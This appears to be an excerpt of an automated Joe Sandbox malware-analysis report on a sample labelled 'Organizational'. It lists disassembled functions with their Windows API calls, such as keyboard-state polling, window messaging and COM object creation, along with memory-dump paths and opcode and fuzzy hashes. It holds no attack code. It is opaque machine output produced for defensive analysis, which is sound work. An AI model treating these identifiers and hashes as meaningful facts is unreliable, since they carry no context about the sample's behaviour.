                                                          • Instruction Fuzzy Hash: C9415B74A14209EFDB20DF64E888AAABBF5FF49310F184429F945A7360D774AD21EF50
                                                          APIs
                                                          • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 002D7B83
                                                          • CreateCompatibleDC.GDI32(00000000), ref: 002D7B8A
                                                          • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 002D7B9D
                                                          • SelectObject.GDI32(00000000,00000000), ref: 002D7BA5
                                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 002D7BB0
                                                          • DeleteDC.GDI32(00000000), ref: 002D7BB9
                                                          • GetWindowLongW.USER32(?,000000EC), ref: 002D7BC3
                                                          • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 002D7BD7
                                                          • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 002D7BE3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                          • String ID: static
                                                          • API String ID: 2559357485-2160076837
                                                          • Opcode ID: d2b668ba1636336d53fc230cc9d138b1e59b0991f1561126c9312f34bbe854f1
                                                          • Instruction ID: 164ae127e1eec9c01f6743e0bc55ea850a420a95d2d66e4cc7c7227584b99631
                                                          • Opcode Fuzzy Hash: d2b668ba1636336d53fc230cc9d138b1e59b0991f1561126c9312f34bbe854f1
                                                          • Instruction Fuzzy Hash: D331BE32154215AFDF119FA4DC88FDB3B69FF09324F100216FA15AA2A0D775DC62DBA4
                                                          APIs
                                                          • _memset.LIBCMT ref: 0027706B
                                                            • Part of subcall function 00278D58: __getptd_noexit.LIBCMT ref: 00278D58
                                                          • __gmtime64_s.LIBCMT ref: 00277104
                                                          • __gmtime64_s.LIBCMT ref: 0027713A
                                                          • __gmtime64_s.LIBCMT ref: 00277157
                                                          • __allrem.LIBCMT ref: 002771AD
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002771C9
                                                          • __allrem.LIBCMT ref: 002771E0
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002771FE
                                                          • __allrem.LIBCMT ref: 00277215
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00277233
                                                          • __invoke_watson.LIBCMT ref: 002772A4
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                          • String ID:
                                                          • API String ID: 384356119-0
                                                          • Opcode ID: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                                          • Instruction ID: 0cd732e87482a23b0ed4fef2967ad1ddfe9552496b4d8cea143787211aada74a
                                                          • Opcode Fuzzy Hash: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                                          • Instruction Fuzzy Hash: 0A71FB71A25717ABD714EE79CC41B5AB3A8AF11720F14C23AF91CE76C1E770D9608B90
                                                          APIs
                                                          • _memset.LIBCMT ref: 002B2CE9
                                                          • GetMenuItemInfoW.USER32(00317890,000000FF,00000000,00000030), ref: 002B2D4A
                                                          • SetMenuItemInfoW.USER32(00317890,00000004,00000000,00000030), ref: 002B2D80
                                                          • Sleep.KERNEL32(000001F4), ref: 002B2D92
                                                          • GetMenuItemCount.USER32(?), ref: 002B2DD6
                                                          • GetMenuItemID.USER32(?,00000000), ref: 002B2DF2
                                                          • GetMenuItemID.USER32(?,-00000001), ref: 002B2E1C
                                                          • GetMenuItemID.USER32(?,?), ref: 002B2E61
                                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 002B2EA7
                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002B2EBB
                                                          • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002B2EDC
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                          • String ID:
                                                          • API String ID: 4176008265-0
                                                          • Opcode ID: 074db1ff10af05ab0a92c27ee333c53fac1290d8a45d81a1fe61ce605e632d55
                                                          • Instruction ID: fa0534d39b3803b88495ab76f4af337ddf99a35bffd56b66c599a1d45a94005c
                                                          • Opcode Fuzzy Hash: 074db1ff10af05ab0a92c27ee333c53fac1290d8a45d81a1fe61ce605e632d55
                                                          • Instruction Fuzzy Hash: B761AC7092034AEFDB11DF65DC88AEE7BB8EB05384F144459F841AB251D771ED6ACB20
                                                          APIs
                                                          • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 002D75CA
                                                          • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 002D75CD
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 002D75F1
                                                          • _memset.LIBCMT ref: 002D7602
                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 002D7614
                                                          • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 002D768C
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$LongWindow_memset
                                                          • String ID:
                                                          • API String ID: 830647256-0
                                                          • Opcode ID: 1f6d93ff6614e0ad7d53569b2087bcd20d03f8a21d6318a49bfe343350caed23
                                                          • Instruction ID: 73bd1c1d7d70671df516eca2e416206c532d7fb7930cc340f160ae6e765d4104
                                                          • Opcode Fuzzy Hash: 1f6d93ff6614e0ad7d53569b2087bcd20d03f8a21d6318a49bfe343350caed23
                                                          • Instruction Fuzzy Hash: 39619A75910208AFDB11DFA8CC85EEEB7F8EB09710F14409AFA14A73A1D774AD51DBA0
                                                          APIs
                                                          • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 002A77DD
                                                          • SafeArrayAllocData.OLEAUT32(?), ref: 002A7836
                                                          • VariantInit.OLEAUT32(?), ref: 002A7848
                                                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 002A7868
                                                          • VariantCopy.OLEAUT32(?,?), ref: 002A78BB
                                                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 002A78CF
                                                          • VariantClear.OLEAUT32(?), ref: 002A78E4
                                                          • SafeArrayDestroyData.OLEAUT32(?), ref: 002A78F1
                                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 002A78FA
                                                          • VariantClear.OLEAUT32(?), ref: 002A790C
                                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 002A7917
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                           • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                          • String ID:
                                                          • API String ID: 2706829360-0
                                                          • Opcode ID: 6e8020c2bbee556c04d4a4f616d2eb223fab3c2a05870695b1b61375e67a7a6a
                                                          • Instruction ID: dfd79915484abb43bfb991d652c5bfabb64597f1dc06ea4ae35e34b8594b58f0
                                                          • Opcode Fuzzy Hash: 6e8020c2bbee556c04d4a4f616d2eb223fab3c2a05870695b1b61375e67a7a6a
                                                          • Instruction Fuzzy Hash: BC417735A10119DFCB00DFA4DC88DADBBB9FF08314F008069E955AB261CB74A996CFA4
                                                          APIs
                                                          • GetKeyboardState.USER32(?), ref: 002B0530
                                                          • GetAsyncKeyState.USER32(000000A0), ref: 002B05B1
                                                          • GetKeyState.USER32(000000A0), ref: 002B05CC
                                                          • GetAsyncKeyState.USER32(000000A1), ref: 002B05E6
                                                          • GetKeyState.USER32(000000A1), ref: 002B05FB
                                                          • GetAsyncKeyState.USER32(00000011), ref: 002B0613
                                                          • GetKeyState.USER32(00000011), ref: 002B0625
                                                          • GetAsyncKeyState.USER32(00000012), ref: 002B063D
                                                          • GetKeyState.USER32(00000012), ref: 002B064F
                                                          • GetAsyncKeyState.USER32(0000005B), ref: 002B0667
                                                          • GetKeyState.USER32(0000005B), ref: 002B0679
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                           • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: State$Async$Keyboard
                                                          • String ID:
                                                          • API String ID: 541375521-0
                                                          • Opcode ID: f978ea97b070b3a769aaa0c79a5848624064a791129e637592ae31a499011a47
                                                          • Instruction ID: 6c361cf5660c61be1f1fc423cc80b68fd81cb4da7971eb0ba451920506aea3df
                                                          • Opcode Fuzzy Hash: f978ea97b070b3a769aaa0c79a5848624064a791129e637592ae31a499011a47
                                                          • Instruction Fuzzy Hash: 2641B5209547CB5DFF328E6488843F7BFA4BB51384F44405AD5C54A5C2EBD499F48F91
                                                          APIs
                                                            • Part of subcall function 00254D37: __itow.LIBCMT ref: 00254D62
                                                            • Part of subcall function 00254D37: __swprintf.LIBCMT ref: 00254DAC
                                                          • CoInitialize.OLE32 ref: 002C8AED
                                                          • CoUninitialize.OLE32 ref: 002C8AF8
                                                          • CoCreateInstance.OLE32(?,00000000,00000017,002E3BBC,?), ref: 002C8B58
                                                          • IIDFromString.OLE32(?,?), ref: 002C8BCB
                                                          • VariantInit.OLEAUT32(?), ref: 002C8C65
                                                          • VariantClear.OLEAUT32(?), ref: 002C8CC6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                           • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                          • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                          • API String ID: 834269672-1287834457
                                                          • Opcode ID: 6464941d4f169280eb3967aab0de2ce79fad43ecc06789e29a0c9d41c41fb53f
                                                          • Instruction ID: 9842c6ee7aeda6e6789416cbeaab510c347a36c5401202f31b0574ff9a11bcca
                                                          • Opcode Fuzzy Hash: 6464941d4f169280eb3967aab0de2ce79fad43ecc06789e29a0c9d41c41fb53f
                                                          • Instruction Fuzzy Hash: F661B1702257119FD714DF14C888F6EB7E8AF45718F00894EF9859B291CB70EE58CBA6
                                                          APIs
                                                          • SetErrorMode.KERNEL32(00000001), ref: 002BBB13
                                                          • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 002BBB89
                                                          • GetLastError.KERNEL32 ref: 002BBB93
                                                          • SetErrorMode.KERNEL32(00000000,READY), ref: 002BBC00
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                           • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Error$Mode$DiskFreeLastSpace
                                                          • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                          • API String ID: 4194297153-14809454
                                                          • Opcode ID: 05d423f1e5a39f39703b5a9d63d367f01c77dae7894e03e6c2a64fbc9fceaad6
                                                          • Instruction ID: b300dbde1bb72b178bf20a4fe102ef91f06d954a3e0f285a55a5aa438ea26372
                                                          • Opcode Fuzzy Hash: 05d423f1e5a39f39703b5a9d63d367f01c77dae7894e03e6c2a64fbc9fceaad6
                                                          • Instruction Fuzzy Hash: 0D31D735A20209AFCB12EF68C899EEDB7B8EF44348F148065ED05D72D5DBF09962CB51
                                                          APIs
                                                          • LoadIconW.USER32(00000000,00007F03), ref: 002B357C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                           • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: IconLoad
                                                          • String ID: ,z10z1$,z10z1$blank$info$question$stop$warning
                                                          • API String ID: 2457776203-4168031347
                                                          • Opcode ID: 8cf5004c74c10817f6f408d5cb46f6e195f270cdd4c950bd70de9d6466b18765
                                                          • Instruction ID: 6e3c77fff3cb0028411e18ea234e8d13bbd38619c2287e0745b5be6d44ea751a
                                                          • Opcode Fuzzy Hash: 8cf5004c74c10817f6f408d5cb46f6e195f270cdd4c950bd70de9d6466b18765
                                                          • Instruction Fuzzy Hash: CE112B72769347BEE725CE14DC92CEA779CDF0D3A0B50001AF514661C1E7B46F505BA0
                                                          APIs
                                                            • Part of subcall function 00261A36: _memmove.LIBCMT ref: 00261A77
                                                            • Part of subcall function 002AB79A: GetClassNameW.USER32(?,?,000000FF), ref: 002AB7BD
                                                          • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 002A9BCC
                                                          • GetDlgCtrlID.USER32 ref: 002A9BD7
                                                          • GetParent.USER32 ref: 002A9BF3
                                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 002A9BF6
                                                          • GetDlgCtrlID.USER32(?), ref: 002A9BFF
                                                          • GetParent.USER32(?), ref: 002A9C1B
                                                          • SendMessageW.USER32(00000000,?,?,00000111), ref: 002A9C1E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                           • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                          • String ID: ComboBox$ListBox
                                                          • API String ID: 1536045017-1403004172
                                                          • Opcode ID: ed8f64461e7b8f35db60790983507cafc839fb36db155eac921c9f196ddd5a0e
                                                          • Instruction ID: c50342d343ad19ffa48e8fc6777458c518c8d23e88e8ea61b5f8408338fdf0ca
                                                          • Opcode Fuzzy Hash: ed8f64461e7b8f35db60790983507cafc839fb36db155eac921c9f196ddd5a0e
                                                          • Instruction Fuzzy Hash: C121E071950244ABCF00EBA1DC99EFEBBA9EF9A310F000116F961972D1DBB459B5DE20
                                                          APIs
                                                            • Part of subcall function 00261A36: _memmove.LIBCMT ref: 00261A77
                                                            • Part of subcall function 002AB79A: GetClassNameW.USER32(?,?,000000FF), ref: 002AB7BD
                                                          • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 002A9CB5
                                                          • GetDlgCtrlID.USER32 ref: 002A9CC0
                                                          • GetParent.USER32 ref: 002A9CDC
                                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 002A9CDF
                                                          • GetDlgCtrlID.USER32(?), ref: 002A9CE8
                                                          • GetParent.USER32(?), ref: 002A9D04
                                                          • SendMessageW.USER32(00000000,?,?,00000111), ref: 002A9D07
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                           • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                          • String ID: ComboBox$ListBox
                                                          • API String ID: 1536045017-1403004172
                                                          • Opcode ID: ef98698e382e2c2a680e1a802bacea7f3e2ba27b6aae6577e307e5d9aa1a0ad3
                                                          • Instruction ID: 7aeb472c481912a4a1188c08229b48980c076ae980492f396b0585aee6e271fd
                                                          • Opcode Fuzzy Hash: ef98698e382e2c2a680e1a802bacea7f3e2ba27b6aae6577e307e5d9aa1a0ad3
                                                          • Instruction Fuzzy Hash: 7C21C171950244ABDF00ABA1DCC5EFEBBB9EF99300F100016F95197291DBB559B9DE20
                                                          APIs
                                                          • GetParent.USER32 ref: 002A9D27
                                                          • GetClassNameW.USER32(00000000,?,00000100), ref: 002A9D3C
                                                          • _wcscmp.LIBCMT ref: 002A9D4E
                                                          • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 002A9DC9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                           • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: ClassMessageNameParentSend_wcscmp
                                                          • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                          • API String ID: 1704125052-3381328864
                                                          • Opcode ID: 1c7efe7d7965d6919f81f33db41aa37531a71e860a9be4fe60d11ea34bf3c1af
                                                          • Instruction ID: 465c5445a5a905a5092a94703321da5e014e8a6625c1a3473bec9a65b14164ce
                                                          • Opcode Fuzzy Hash: 1c7efe7d7965d6919f81f33db41aa37531a71e860a9be4fe60d11ea34bf3c1af
                                                          • Instruction Fuzzy Hash: 0C11E377268B17BBFA017A25FC16DA7739CEB07320B200016FA08A40D1FEA66AF15D55
                                                          APIs
                                                          • VariantInit.OLEAUT32(?), ref: 002C8FC1
                                                          • CoInitialize.OLE32(00000000), ref: 002C8FEE
                                                          • CoUninitialize.OLE32 ref: 002C8FF8
                                                          • GetRunningObjectTable.OLE32(00000000,?), ref: 002C90F8
                                                          • SetErrorMode.KERNEL32(00000001,00000029), ref: 002C9225
                                                          • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,002E3BDC), ref: 002C9259
                                                          • CoGetObject.OLE32(?,00000000,002E3BDC,?), ref: 002C927C
                                                          • SetErrorMode.KERNEL32(00000000), ref: 002C928F
                                                          • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 002C930F
                                                          • VariantClear.OLEAUT32(?), ref: 002C931F
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                           • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                          • String ID:
                                                          • API String ID: 2395222682-0
                                                          • Opcode ID: 1a0deae06d12f00e9d54899d6d38bb7b13f5744d1f5728d33a5b3414bc38469f
                                                          • Instruction ID: 3a5e360ccb7213f334941f5ced882bd7f39083e226a73a6188ba281202677da6
                                                          • Opcode Fuzzy Hash: 1a0deae06d12f00e9d54899d6d38bb7b13f5744d1f5728d33a5b3414bc38469f
                                                          • Instruction Fuzzy Hash: E4C12671214345AFD700DF64C888E2AB7E9FF89708F004A1DF98A9B251DB71ED96CB52
                                                          APIs
                                                          • GetCurrentThreadId.KERNEL32 ref: 002B19EF
                                                          • GetForegroundWindow.USER32(00000000,?,?,?,?,?,002B0A67,?,00000001), ref: 002B1A03
                                                          • GetWindowThreadProcessId.USER32(00000000), ref: 002B1A0A
                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,002B0A67,?,00000001), ref: 002B1A19
                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 002B1A2B
                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,002B0A67,?,00000001), ref: 002B1A44
                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,002B0A67,?,00000001), ref: 002B1A56
                                                          • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,002B0A67,?,00000001), ref: 002B1A9B
                                                          • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,002B0A67,?,00000001), ref: 002B1AB0
                                                          • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,002B0A67,?,00000001), ref: 002B1ABB
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                           • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                          • String ID:
                                                          • API String ID: 2156557900-0
                                                          • Opcode ID: b1357286ca6228af1e119c99f25611abfa07982fbec8d428a436aac228086c16
                                                          • Instruction ID: a511694755efc8c6a80ccbec48195927aa429a06b4e87bffe02600ab444d6359
                                                          • Opcode Fuzzy Hash: b1357286ca6228af1e119c99f25611abfa07982fbec8d428a436aac228086c16
                                                          • Instruction Fuzzy Hash: 3E31E171521245AFDB119F50FCD8BEA77AEEB58395F508115F800CA190CBB4ADA1CB64
